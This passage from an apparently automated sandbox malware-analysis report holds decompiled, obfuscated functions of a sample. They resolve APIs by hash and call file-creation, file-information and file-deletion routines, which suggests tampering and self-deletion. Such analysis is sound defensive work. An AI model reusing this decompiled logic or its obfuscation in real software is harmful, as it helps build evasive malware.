FindFirstFileW.KERNELBASE(?,?,00000000,029C998D,16BF64F2,00000001), ref: 029C3A5D
FindClose.KERNELBASE(?,00000000,029C998D,16BF64F2,00000001), ref: 029C3B91

Strings

8T], xrefs: 029C3A22
Ei, xrefs: 029C3AD8
., xrefs: 029C3A95
8T], xrefs: 029C3910
Ei, xrefs: 029C399D

Memory Dump Source

Source File: 00000000.00000002.249838612.00000000029C1000.00000020.00000001.sdmp, Offset: 029C0000, based on PE: true

Associated: 00000000.00000002.249823573.00000000029C0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.249848856.00000000029CD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.249854417.00000000029D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29c0000_0TOEtGJHN8.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID: .$8T]$8T]$Ei$Ei
API String ID: 3541575487-3972632629
Opcode ID: ebfa8396c2e0b3eb634b691aaf159c69557010de4e9050a766aedcf37d1032a1
Instruction ID: cf99e300b689a3606a74f7bc131336e1ef61f77243998a5c87fe8c5f55f23dce
Opcode Fuzzy Hash: ebfa8396c2e0b3eb634b691aaf159c69557010de4e9050a766aedcf37d1032a1
Instruction Fuzzy Hash: 44510B7174820197D728AB78D8406BB76EA9BC4244F30CDADF946C7340EF36C91587AB

Uniqueness

Uniqueness Score: -1.00%

Function 029C7EC0, Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 227
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E029C7EC0() {
				short _v524;
				struct _SECURITY_ATTRIBUTES* _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				struct _SECURITY_ATTRIBUTES* _v576;
				intOrPtr _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				void* __ebx;
				void* __ebp;
				void* _t91;
				void* _t93;
				intOrPtr* _t95;
				void* _t97;
				intOrPtr* _t102;
				intOrPtr* _t104;
				intOrPtr* _t109;
				intOrPtr _t113;
				intOrPtr* _t114;
				void* _t116;
				void* _t117;
				void* _t118;
				void* _t121;
				void* _t122;
				void* _t123;
				char _t131;
				intOrPtr _t136;
				unsigned int _t150;
				void* _t153;
				void* _t160;
				void* _t161;
				signed int* _t162;
				void* _t164;

				_t162 =  &_v596;
				_v592 = 0x7beb;
				_t123 = 0x139d8b99;
				_v592 = _v592 | 0x6fda154b;
				_v592 = _v592 + 0xf6a9;
				_v592 = _v592 << 0x10;
				_v592 = _v592 + 0xffffa540;
				_v592 = _v592 ^ 0x7693a440;
				_v588 = 0xc2f;
				_v588 = _v588 << 0xb;
				_t122 = 0;
				_v588 = _v588 * 0x17;
				_v588 = _v588 >> 8;
				_v588 = _v588 ^ 0x0008c1c9;
				_v584 = 0xfdf2;
				_v584 = _v584 << 7;
				_v584 = _v584 ^ 0x007ef903;
				_v596 = 0xe94a;
				_v596 = _v596 ^ 0xa24bbed7;
				_v596 = _v596 | 0x3a5f93cf;
				_t154 = _v596;
				_t161 = _v584;
				_v596 = (_v596 - (0x2c9fb4d9 * _t154 >> 0x20) >> 1) + (0x2c9fb4d9 * _t154 >> 0x20) >> 6;
				_v596 = _v596 | 0xa489ddc5;
				_v596 = _v596 + 0xf775;
				_t150 = 0x1b4e81b5 * _v596 >> 0x20 >> 3;
				_v596 = _t150;
				_v596 = _v596 ^ 0x0235bf01;
				while(1) {
					L1:
					goto L2;
					do {
						while(1) {
							L2:
							_t164 = _t123 - 0x1e3debbe;
							if(_t164 > 0) {
								break;
							}
							if(_t164 == 0) {
								_t97 = E029C34C0(0x29cd910);
								_t150 =  *0x29cdc60;
								_t160 = _t97;
								if(_t150 == 0) {
									_t150 = E029C3E80(_t122, E029C3F20(0xe66945e6), 0xcca28b0d, _t161);
									 *0x29cdc60 = _t150;
								}
								_t136 =  *0x29ce2ec;
								 *_t150( &_v524, 0x104, _t160, _t136 + 0x5c, _t136 + 0x278);
								_t102 =  *0x29cdea8;
								_t162 =  &(_t162[5]);
								if(_t102 == 0) {
									_t118 = E029C3F20(0xbb398380);
									_t150 = 0x97f883e;
									_t102 = E029C3E80(_t122, _t118, 0x97f883e, _t161);
									 *0x29cdea8 = _t102;
								}
								_t153 =  *_t102();
								_t104 =  *0x29ce1a0;
								if(_t104 == 0) {
									_t117 = E029C3F20(0xbb398380);
									_t150 = 0x26c3f343;
									_t104 = E029C3E80(_t122, _t117, 0x26c3f343, _t161);
									 *0x29ce1a0 = _t104;
								}
								 *_t104(_t153, 0, _t160);
								_t123 = 0x2eb48bb5;
								goto L1;
							} else {
								if(_t123 == 0x390f515) {
									_v580 = 0xa8c00;
									_v576 = 0;
									_v596 = E029CB590(_v580, _v576, 0x989680, 0);
									_v592 = _t150;
									_v588 = _v588 - _v596;
									asm("sbb [esp+0x2c], ecx");
									_t123 = 0x1e3debbe;
									continue;
								} else {
									if(_t123 == 0x74c3147) {
										_t109 =  *0x29cdc70;
										if(_t109 == 0) {
											_t109 = E029C3E80(_t122, E029C3F20(0xbb398380), 0x560d239b, _t161);
											 *0x29cdc70 = _t109;
										}
										 *_t109(_t161);
										L34:
										return _t122;
									} else {
										if(_t123 != 0x139d8b99) {
											goto L22;
										} else {
											_t123 = 0x31fe4006;
											continue;
										}
									}
								}
							}
							L35:
						}
						if(_t123 == 0x2eb48bb5) {
							if( *0x29cdfbc == 0) {
								_t93 = E029C3F20(0xbb398380);
								_t150 = 0xc0be2284;
								 *0x29cdfbc = E029C3E80(_t122, _t93, 0xc0be2284, _t161);
							}
							_t91 = CreateFileW( &_v524, _v592, _v588, 0, _v584, _v596, 0); // executed
							_t161 = _t91;
							if(_t161 == 0xffffffff) {
								goto L34;
							} else {
								_t123 = 0x3a4d3f65;
								goto L2;
							}
						} else {
							if(_t123 == 0x31fe4006) {
								_t95 =  *0x29cdfec;
								if(_t95 == 0) {
									_t121 = E029C3F20(0xbb398380);
									_t150 = 0xd4fa8936;
									_t95 = E029C3E80(_t122, _t121, 0xd4fa8936, _t161);
									 *0x29cdfec = _t95;
								}
								 *_t95( &_v572);
								_t123 = 0x390f515;
								goto L2;
							} else {
								if(_t123 != 0x3a4d3f65) {
									goto L22;
								} else {
									_t113 = _v568;
									_t131 = _v572;
									_v560 = _t113;
									_v552 = _t113;
									_v544 = _t113;
									_v536 = _t113;
									_t114 =  *0x29cdf54;
									_v564 = _t131;
									_v556 = _t131;
									_v548 = _t131;
									_v540 = _t131;
									_v532 = 0;
									if(_t114 == 0) {
										_t116 = E029C3F20(0xbb398380);
										_t150 = 0x3d270e76;
										_t114 = E029C3E80(_t122, _t116, 0x3d270e76, _t161);
										 *0x29cdf54 = _t114;
									}
									 *_t114(_t161, 0,  &_v564, 0x28); // executed
									_t123 = 0x74c3147;
									_t122 =  !=  ? 1 : _t122;
									goto L2;
								}
							}
						}
						goto L35;
						L22:
					} while (_t123 != 0x21420c30);
					return _t122;
					goto L35;
				}
			}

0x029c7ec0
0x029c7eca
0x029c7ed2
0x029c7ed7
0x029c7edf
0x029c7ee7
0x029c7eec
0x029c7ef4
0x029c7efc
0x029c7f04
0x029c7f0e
0x029c7f10
0x029c7f19
0x029c7f1e
0x029c7f26
0x029c7f2e
0x029c7f33
0x029c7f3b
0x029c7f43
0x029c7f4b
0x029c7f53
0x029c7f59
0x029c7f6b
0x029c7f6f
0x029c7f77
0x029c7f85
0x029c7f88
0x029c7f8c
0x029c7f94
0x029c7f94
0x029c7f94
0x029c7fa0
0x029c7fa0
0x029c7fa0
0x029c7fa0
0x029c7fa6
0x00000000
0x00000000
0x029c7fac
0x029c801f
0x029c8024
0x029c802a
0x029c802e
0x029c8046
0x029c8048
0x029c8048
0x029c804e
0x029c806a
0x029c806c
0x029c8071
0x029c8076
0x029c807d
0x029c8082
0x029c8089
0x029c808e
0x029c808e
0x029c8095
0x029c8097
0x029c809e
0x029c80a5
0x029c80aa
0x029c80b1
0x029c80b6
0x029c80b6
0x029c80bf
0x029c80c1
0x00000000
0x029c7fae
0x029c7fb4
0x029c7fd7
0x029c7fdf
0x029c7ffb
0x029c7fff
0x029c800b
0x029c800f
0x029c8013
0x00000000
0x029c7fb6
0x029c7fbc
0x029c8200
0x029c8207
0x029c821a
0x029c821f
0x029c821f
0x029c8225
0x029c822a
0x029c8233
0x029c7fc2
0x029c7fc8
0x00000000
0x029c7fce
0x029c7fce
0x00000000
0x029c7fce
0x029c7fc8
0x029c7fbc
0x029c7fb4
0x00000000
0x029c7fac
0x029c80d1
0x029c81b0
0x029c81b7
0x029c81bc
0x029c81ca
0x029c81ca
0x029c81ed
0x029c81ef
0x029c81f4
0x00000000
0x029c81f6
0x029c81f6
0x00000000
0x029c81f6
0x029c80d7
0x029c80dd
0x029c8173
0x029c817a
0x029c8181
0x029c8186
0x029c818d
0x029c8192
0x029c8192
0x029c819c
0x029c819e
0x00000000
0x029c80e3
0x029c80e9
0x00000000
0x029c80eb
0x029c80eb
0x029c80ef
0x029c80f3
0x029c80f7
0x029c80fb
0x029c80ff
0x029c8103
0x029c8108
0x029c810c
0x029c8110
0x029c8114
0x029c8118
0x029c8122
0x029c8129
0x029c812e
0x029c8135
0x029c813a
0x029c813a
0x029c8149
0x029c814d
0x029c8152
0x00000000
0x029c8152
0x029c80e9
0x029c80dd
0x00000000
0x029c815a
0x029c815a
0x029c8172
0x00000000
0x029c8172

APIs

SetFileInformationByHandle.KERNELBASE(007EF903,00000000,?,00000028), ref: 029C8149
CreateFileW.KERNELBASE(?,?,?,00000000,?,0235BF01,00000000), ref: 029C81ED

Strings

Ei, xrefs: 029C8030
{, xrefs: 029C7ECA
e?M:, xrefs: 029C81F6
J, xrefs: 029C7F3B
e?M:, xrefs: 029C80E3

Memory Dump Source

Source File: 00000000.00000002.249838612.00000000029C1000.00000020.00000001.sdmp, Offset: 029C0000, based on PE: true

Associated: 00000000.00000002.249823573.00000000029C0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.249848856.00000000029CD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.249854417.00000000029D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29c0000_0TOEtGJHN8.jbxd

Yara matches

Similarity

API ID: File$CreateHandleInformation
String ID: J$e?M:$e?M:$Ei${
API String ID: 3667790775-2299002149
Opcode ID: 0a26b277e87e23f3c22c6bd3a17241ae8b8dd3ea667e3f7450f119fc41cc73be
Instruction ID: ba2b8623acf983b22cf8d282ddf9bb452a84d0fdfb120127341da610115d3871
Opcode Fuzzy Hash: 0a26b277e87e23f3c22c6bd3a17241ae8b8dd3ea667e3f7450f119fc41cc73be
Instruction Fuzzy Hash: 2581AF71A083019FD318DF69989466BB6EABBC8348F604D2DF59AC7350EB70D9058F93

Uniqueness

Uniqueness Score: -1.00%

Function 029C8240, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 183
fileCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E029C8240(void* __ebx, void* __ebp) {
				short _v524;
				char _v564;
				char _v572;
				struct _SECURITY_ATTRIBUTES* _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				intOrPtr _v596;
				intOrPtr* _t86;
				intOrPtr* _t88;
				void* _t100;
				void* _t101;
				intOrPtr* _t103;
				intOrPtr* _t106;
				void* _t108;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t112;
				unsigned int _t138;
				void* _t140;
				void* _t141;
				signed int _t142;
				intOrPtr _t144;
				void* _t145;
				void* _t148;

				_t145 = __ebp;
				_t112 = __ebx;
				_v592 = 0xe2e3;
				_v592 = _v592 ^ 0xd0dd7a16;
				_t142 = 0x20540118;
				_v592 = _v592 * 0x3d;
				_v592 = _v592 | 0xc45f2d48;
				_v592 = _v592 + 0xffffa838;
				_v592 = _v592 + 0xde6b;
				_v592 = _v592 ^ 0xf67dff2c;
				_v592 = _v592 + _v592 * 4 << 2;
				_v592 = _v592 ^ 0xf4577600;
				_v584 = 0xc2f;
				_v584 = _v584 << 0xb;
				_v584 = _v584 * 0x17;
				_v584 = _v584 >> 8;
				_v584 = _v584 ^ 0x0008c1c9;
				_v580 = 0xfdf2;
				_v580 = _v580 << 7;
				_v580 = _v580 ^ 0x007ef903;
				_v588 = 0xe94a;
				_v588 = _v588 ^ 0xa24bbed7;
				_v588 = _v588 | 0x3a5f93cf;
				_t113 = _v588;
				_t141 = _v580;
				_v588 = (_v588 - (0x2c9fb4d9 * _t113 >> 0x20) >> 1) + (0x2c9fb4d9 * _t113 >> 0x20) >> 6;
				_v588 = _v588 | 0xa489ddc5;
				_v588 = _v588 + 0xf775;
				_t138 = 0x1b4e81b5 * _v588 >> 0x20 >> 3;
				_v588 = _t138;
				_v588 = _v588 ^ 0x0235bf01;
				while(1) {
					L1:
					_t148 = _t142 - 0x17c5ef14;
					if(_t148 > 0) {
						break;
					}
					if(_t148 == 0) {
						_t86 =  *0x29cdfec;
						__eflags = _t86;
						if(_t86 == 0) {
							_t111 = E029C3F20(0xbb398380);
							_t138 = 0xd4fa8936;
							_t86 = E029C3E80(_t112, _t111, 0xd4fa8936, _t145);
							 *0x29cdfec = _t86;
						}
						 *_t86( &_v572);
						_t142 = 0x2295af4;
						continue;
					} else {
						if(_t142 == 0xa7036f) {
							_t88 =  *0x29cde58;
							__eflags = _t88;
							if(_t88 == 0) {
								_t110 = E029C3F20(0xbb398380);
								_t138 = 0xb1aefb5;
								_t88 = E029C3E80(_t112, _t110, 0xb1aefb5, _t145);
								 *0x29cde58 = _t88;
							}
							 *_t88(0,  &_v524, 0x104);
							_t142 = 0xfef53a6;
							continue;
						} else {
							if(_t142 == 0x2295af4) {
								_v580 = 0xa8c00;
								_v576 = 0;
								_v596 = E029CB590(_v580, _v576, 0x989680, 0);
								_v592 = _t138;
								_t140 = _v588 - _v564;
								_t144 = _v596;
								asm("sbb ecx, [esp+0x3c]");
								__eflags = _v584 - _v592;
								if(__eflags < 0) {
									goto L24;
								} else {
									if(__eflags > 0) {
										L29:
										return 1;
									} else {
										__eflags = _t140 - _t144;
										if(_t140 < _t144) {
											goto L24;
										} else {
											goto L29;
										}
									}
								}
							} else {
								if(_t142 != 0xfef53a6) {
									L23:
									__eflags = _t142 - 0x2ffd856e;
									if(_t142 != 0x2ffd856e) {
										continue;
									} else {
										goto L24;
									}
								} else {
									if( *0x29cdfbc == 0) {
										_t101 = E029C3F20(0xbb398380);
										_t138 = 0xc0be2284;
										 *0x29cdfbc = E029C3E80(_t112, _t101, 0xc0be2284, _t145);
									}
									_t100 = CreateFileW( &_v524, _v592, _v584, 0, _v580, _v588, 0); // executed
									_t141 = _t100;
									if(_t141 == 0xffffffff) {
										L24:
										__eflags = 0;
										return 0;
									} else {
										_t142 = 0x28eddbc7;
										continue;
									}
								}
							}
						}
					}
					L30:
				}
				__eflags = _t142 - 0x20540118;
				if(_t142 == 0x20540118) {
					_t142 = 0xa7036f;
					goto L1;
				} else {
					__eflags = _t142 - 0x28eddbc7;
					if(_t142 == 0x28eddbc7) {
						_t103 =  *0x29ce1e4;
						__eflags = _t103;
						if(_t103 == 0) {
							_t109 = E029C3F20(0xbb398380);
							_t138 = 0xfddf2477;
							_t103 = E029C3E80(_t112, _t109, 0xfddf2477, _t145);
							 *0x29ce1e4 = _t103;
						}
						 *_t103(_t141, 0,  &_v564, 0x28);
						asm("sbb esi, esi");
						_t106 =  *0x29cdc70;
						_t142 = (_t142 & 0xe7c869a6) + 0x2ffd856e;
						__eflags = _t106;
						if(_t106 == 0) {
							_t108 = E029C3F20(0xbb398380);
							_t138 = 0x560d239b;
							_t106 = E029C3E80(_t112, _t108, 0x560d239b, _t145);
							 *0x29cdc70 = _t106;
						}
						 *_t106(_t141);
					}
					goto L23;
				}
				goto L30;
			}

0x029c8240
0x029c8240
0x029c8246
0x029c824e
0x029c825d
0x029c8262
0x029c8266
0x029c826e
0x029c8276
0x029c827e
0x029c8290
0x029c8294
0x029c829c
0x029c82a4
0x029c82ae
0x029c82b7
0x029c82bc
0x029c82c4
0x029c82cc
0x029c82d1
0x029c82d9
0x029c82e1
0x029c82e9
0x029c82f1
0x029c82f7
0x029c8309
0x029c830d
0x029c8315
0x029c8323
0x029c8326
0x029c832a
0x029c8332
0x029c8332
0x029c8332
0x029c8338
0x00000000
0x00000000
0x029c833e
0x029c83fc
0x029c8401
0x029c8403
0x029c840a
0x029c840f
0x029c8416
0x029c841b
0x029c841b
0x029c8425
0x029c8427
0x00000000
0x029c8344
0x029c834a
0x029c83c0
0x029c83c5
0x029c83c7
0x029c83ce
0x029c83d3
0x029c83da
0x029c83df
0x029c83df
0x029c83f0
0x029c83f2
0x00000000
0x029c834c
0x029c8352
0x029c84cf
0x029c84d7
0x029c84f7
0x029c84fb
0x029c8503
0x029c8507
0x029c850b
0x029c8513
0x029c8515
0x00000000
0x029c8517
0x029c8517
0x029c851e
0x029c852a
0x029c8519
0x029c8519
0x029c851b
0x00000000
0x00000000
0x00000000
0x00000000
0x029c851b
0x029c8517
0x029c8358
0x029c835e
0x029c84ac
0x029c84ac
0x029c84b2
0x00000000
0x00000000
0x00000000
0x00000000
0x029c8364
0x029c836c
0x029c8373
0x029c8378
0x029c8386
0x029c8386
0x029c83a9
0x029c83ab
0x029c83b0
0x029c84b8
0x029c84b8
0x029c84c2
0x029c83b6
0x029c83b6
0x00000000
0x029c83b6
0x029c83b0
0x029c835e
0x029c8352
0x029c834a
0x00000000
0x029c833e
0x029c8431
0x029c8437
0x029c84c3
0x00000000
0x029c843d
0x029c843d
0x029c8443
0x029c8445
0x029c844a
0x029c844c
0x029c8453
0x029c8458
0x029c845f
0x029c8464
0x029c8464
0x029c8473
0x029c8477
0x029c8479
0x029c8484
0x029c848a
0x029c848c
0x029c8493
0x029c8498
0x029c849f
0x029c84a4
0x029c84a4
0x029c84aa
0x029c84aa
0x00000000
0x029c8443
0x00000000

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,?,0235BF01,00000000,?,?,00000000,2564BE4F), ref: 029C83A9

Strings

J, xrefs: 029C82D9

Memory Dump Source

Source File: 00000000.00000002.249838612.00000000029C1000.00000020.00000001.sdmp, Offset: 029C0000, based on PE: true

Associated: 00000000.00000002.249823573.00000000029C0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.249848856.00000000029CD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.249854417.00000000029D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29c0000_0TOEtGJHN8.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: J
API String ID: 823142352-2715717022
Opcode ID: 9ead5b0020cc6209ad99e2bf5b0606f908b7cab6a5b0bc10a170227e0532208b
Instruction ID: 3cf3dbd4bff83cedbd305fb8d5801e1eb34dd76fa8d57a6b43cf79524026fcd7
Opcode Fuzzy Hash: 9ead5b0020cc6209ad99e2bf5b0606f908b7cab6a5b0bc10a170227e0532208b
Instruction Fuzzy Hash: E861BE72A083019BD718DF68D894A2FB7E6BBC4744F248D2DF4999B280D774D9098F93

Uniqueness

Uniqueness Score: -1.00%

Function 029C36B0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			E029C36B0(void* __ecx, void* __edi, void* __esi, void* __eflags) {
				char _v520;
				intOrPtr* _t3;
				intOrPtr* _t5;
				intOrPtr* _t7;
				int _t10;
				void* _t16;
				void* _t34;
				void* _t35;
				void* _t38;
				void* _t40;
				void* _t41;
				WCHAR* _t42;

				_t41 =  &_v520;
				_t34 = __ecx;
				_t38 = E029C34C0(0x29cd210);
				_t3 =  *0x29cdc60;
				if(_t3 == 0) {
					_t3 = E029C3E80(_t16, E029C3F20(0xe66945e6), 0xcca28b0d, _t40);
					 *0x29cdc60 = _t3;
				}
				 *_t3( &_v520, 0x104, _t38, _t34);
				_t5 =  *0x29cdea8;
				_t42 = _t41 + 0x10;
				if(_t5 == 0) {
					_t5 = E029C3E80(_t16, E029C3F20(0xbb398380), 0x97f883e, _t40);
					 *0x29cdea8 = _t5;
				}
				_t35 =  *_t5();
				_t7 =  *0x29ce1a0;
				if(_t7 == 0) {
					_t7 = E029C3E80(_t16, E029C3F20(0xbb398380), 0x26c3f343, _t40);
					 *0x29ce1a0 = _t7;
				}
				 *_t7(_t35, 0, _t38);
				if( *0x29cdf94 == 0) {
					 *0x29cdf94 = E029C3E80(_t16, E029C3F20(0xbb398380), 0x86a49eb, _t40);
				}
				_t10 = DeleteFileW(_t42); // executed
				return _t10;
			}

0x029c36b0
0x029c36b8
0x029c36c4
0x029c36c6
0x029c36cd
0x029c36e0
0x029c36e5
0x029c36e5
0x029c36f6
0x029c36f8
0x029c36fd
0x029c3702
0x029c3715
0x029c371a
0x029c371a
0x029c3721
0x029c3723
0x029c372a
0x029c373d
0x029c3742
0x029c3742
0x029c374b
0x029c3756
0x029c376e
0x029c376e
0x029c3777
0x029c377f

APIs

DeleteFileW.KERNELBASE ref: 029C3777

Strings

Ei, xrefs: 029C36CF

Memory Dump Source

Source File: 00000000.00000002.249838612.00000000029C1000.00000020.00000001.sdmp, Offset: 029C0000, based on PE: true

Associated: 00000000.00000002.249823573.00000000029C0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.249848856.00000000029CD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.249854417.00000000029D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29c0000_0TOEtGJHN8.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID: Ei
API String ID: 4033686569-3988083245
Opcode ID: 2453bae37a2eb8b2b682ac9b389f41d013be24b4522060b84bd0ec93b82b9565
Instruction ID: 14d85cc9464ad0efd6a805086737f301b2634e79fc2b010bd80968d743bd0314
Opcode Fuzzy Hash: 2453bae37a2eb8b2b682ac9b389f41d013be24b4522060b84bd0ec93b82b9565
Instruction Fuzzy Hash: 4911C4B1F442006BE714B7B9A8506BB35D7ABC0244B308D7CE456C7344EE34C9118BAB

Uniqueness

Uniqueness Score: -1.00%

Function 0040A274, Relevance: 16.6, APIs: 11, Instructions: 112
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 67%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				void* _t27;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr* _t55;
				void* _t57;
				intOrPtr _t58;
				intOrPtr _t61;

				_t57 = _t58;
				_push(0xffffffff);
				_push(0x40c000);
				_push(0x40a424);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				 *((intOrPtr*)(_t57 - 0x18)) = _t58 - 0x68;
				 *((intOrPtr*)(_t57 - 4)) = 0;
				__set_app_type(2);
				 *0xc1da4c =  *0xc1da4c | 0xffffffff;
				 *0xc1da5c =  *0xc1da5c | 0xffffffff;
				 *(__p__fmode()) =  *0xc1da3c;
				 *(__p__commode()) =  *0xc1da38;
				 *0xc1da40 = _adjust_fdiv;
				_t27 = E0040A411( *_adjust_fdiv);
				_t61 =  *0x40da00; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E0040A40E);
				}
				E0040A3F6(_t27);
				_push(0x40d418);
				_push(0x40d314);
				L0040A3F0();
				 *(_t57 - 0x6c) =  *0xc1da34;
				__getmainargs(_t57 - 0x60, _t57 - 0x70, _t57 - 0x64,  *0xc1da30, _t57 - 0x6c);
				_push(0x40d210);
				_push(0x40d000); // executed
				L0040A3F0(); // executed
				_t55 =  *_acmdln;
				 *((intOrPtr*)(_t57 - 0x74)) = _t55;
				if( *_t55 != 0x22) {
					while( *_t55 > 0x20) {
						_t55 = _t55 + 1;
						 *((intOrPtr*)(_t57 - 0x74)) = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						 *((intOrPtr*)(_t57 - 0x74)) = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						 *((intOrPtr*)(_t57 - 0x74)) = _t55;
					}
				}
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				 *(_t57 - 0x30) = 0;
				GetStartupInfoA(_t57 - 0x5c);
				if(( *(_t57 - 0x30) & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 =  *(_t57 - 0x2c) & 0x0000ffff;
				}
				_push(_t38);
				_push(_t55);
				_t40 = L00401154(GetModuleHandleA(0), 0); // executed
				 *(_t57 - 0x68) = _t40;
				exit(_t40);
				_t41 =  *((intOrPtr*)(_t57 - 0x14));
				_t49 =  *((intOrPtr*)( *_t41));
				 *((intOrPtr*)(_t57 - 0x78)) = _t49;
				_push(_t41);
				_push(_t49);
				L0040A3DE();
				return _t41;
			}

0x0040a276
0x0040a277
0x0040a279
0x0040a27e
0x0040a289
0x0040a28a
0x0040a297
0x0040a29c
0x0040a2a1
0x0040a2a8
0x0040a2af
0x0040a2c2
0x0040a2d0
0x0040a2d9
0x0040a2de
0x0040a2e3
0x0040a2e9
0x0040a2f0
0x0040a2f6
0x0040a2f7
0x0040a2fc
0x0040a301
0x0040a306
0x0040a310
0x0040a329
0x0040a32f
0x0040a334
0x0040a339
0x0040a346
0x0040a348
0x0040a34e
0x0040a38a
0x0040a38f
0x0040a390
0x0040a390
0x0040a350
0x0040a350
0x0040a350
0x0040a351
0x0040a354
0x0040a356
0x0040a361
0x0040a363
0x0040a363
0x0040a364
0x0040a364
0x0040a361
0x0040a367
0x0040a36b
0x00000000
0x00000000
0x0040a371
0x0040a378
0x0040a382
0x0040a397
0x0040a384
0x0040a384
0x0040a384
0x0040a398
0x0040a399
0x0040a3a3
0x0040a3a8
0x0040a3ac
0x0040a3b2
0x0040a3b7
0x0040a3b9
0x0040a3bc
0x0040a3bd
0x0040a3be
0x0040a3c5

APIs

__set_app_type.MSVCRT ref: 0040A2A1
__p__fmode.MSVCRT ref: 0040A2B6
__p__commode.MSVCRT ref: 0040A2C4
__setusermatherr.MSVCRT ref: 0040A2F0
_initterm.MSVCRT ref: 0040A306
__getmainargs.MSVCRT ref: 0040A329
_initterm.MSVCRT ref: 0040A339
GetStartupInfoA.KERNEL32(?), ref: 0040A378
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0040A39C
exit.MSVCRT ref: 0040A3AC
_XcptFilter.MSVCRT ref: 0040A3BE

Memory Dump Source

Source File: 00000000.00000002.248952062.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.248947975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.248961448.000000000040D000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.249010593.0000000000C1E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249017316.0000000000C20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249059379.0000000000C62000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0TOEtGJHN8.jbxd

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID:
API String ID: 801014965-0
Opcode ID: 551dc8b2af765491c33ea83df1cd4efc949063384e421c326e445c2222268828
Instruction ID: 40e8669a72c36f2df577adfdbff53e7502eb4e8cd4a7900511b47e5e9f80bdbe
Opcode Fuzzy Hash: 551dc8b2af765491c33ea83df1cd4efc949063384e421c326e445c2222268828
Instruction Fuzzy Hash: EB417C75844344EFDB20DFA4DC45BAE7BB8FB0A714F24812BE842A72D1D7784850DB16

Uniqueness

Uniqueness Score: -1.00%

Function 029C30D0, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 150
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			E029C30D0() {
				void* __ebx;
				void* __ecx;
				void* __ebp;
				void* _t52;
				intOrPtr* _t68;
				void* _t71;
				intOrPtr _t76;
				intOrPtr _t77;
				intOrPtr* _t85;
				intOrPtr* _t90;
				signed int _t95;
				void* _t100;
				void* _t101;
				signed int _t102;
				void* _t103;
				void* _t104;

				_t76 =  *((intOrPtr*)(_t103 + 0xc));
				_t52 = 0x22788346;
				_t102 =  *(_t103 + 0x10);
				_t100 =  *(_t103 + 0x14);
				_t95 =  *(_t103 + 0x18);
				while(1) {
					L1:
					do {
						while(1) {
							L2:
							_t104 = _t52 - 0xec2173f;
							if(_t104 <= 0) {
								break;
							}
							if(_t52 == 0x22788346) {
								 *(_t103 + 0x10) = 0x3d53;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) << 5;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) + 0xffff5fed;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) >> 8;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) + 0xffffd292;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) >> 4;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) | 0x4ce86fd0;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) >> 0xe;
								 *(_t103 + 0x10) =  *(_t103 + 0x10) ^ 0x8e6c81db;
								 *(_t103 + 0x18) = 0xed42;
								 *(_t103 + 0x18) =  *(_t103 + 0x18) << 0xd;
